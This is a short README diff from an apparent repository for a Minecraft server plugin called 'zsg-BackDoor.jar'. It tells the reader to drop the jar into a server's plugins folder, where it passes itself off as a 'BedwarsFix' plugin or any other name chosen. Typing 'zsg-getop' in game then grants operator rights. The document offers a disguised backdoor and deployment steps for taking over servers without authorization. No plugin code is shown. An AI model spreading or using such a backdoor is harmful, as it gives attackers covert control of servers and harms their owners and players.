Imzsg/MC-Server-Crash/README.md

 # MC-Server-Crash
 A Plugin that can let you become operater!

-1.Drag "zsgBackDoor.jar" into the "Plugins"
+1.Drag "zsg-BackDoor.jar" into the "Plugins"
 2.It will pretend as a BedwarsFix plugins,you can replace it to anythings 3.Enter the game,type "zsg-getop"
 4.Now you are OPETATOR !!!!!!!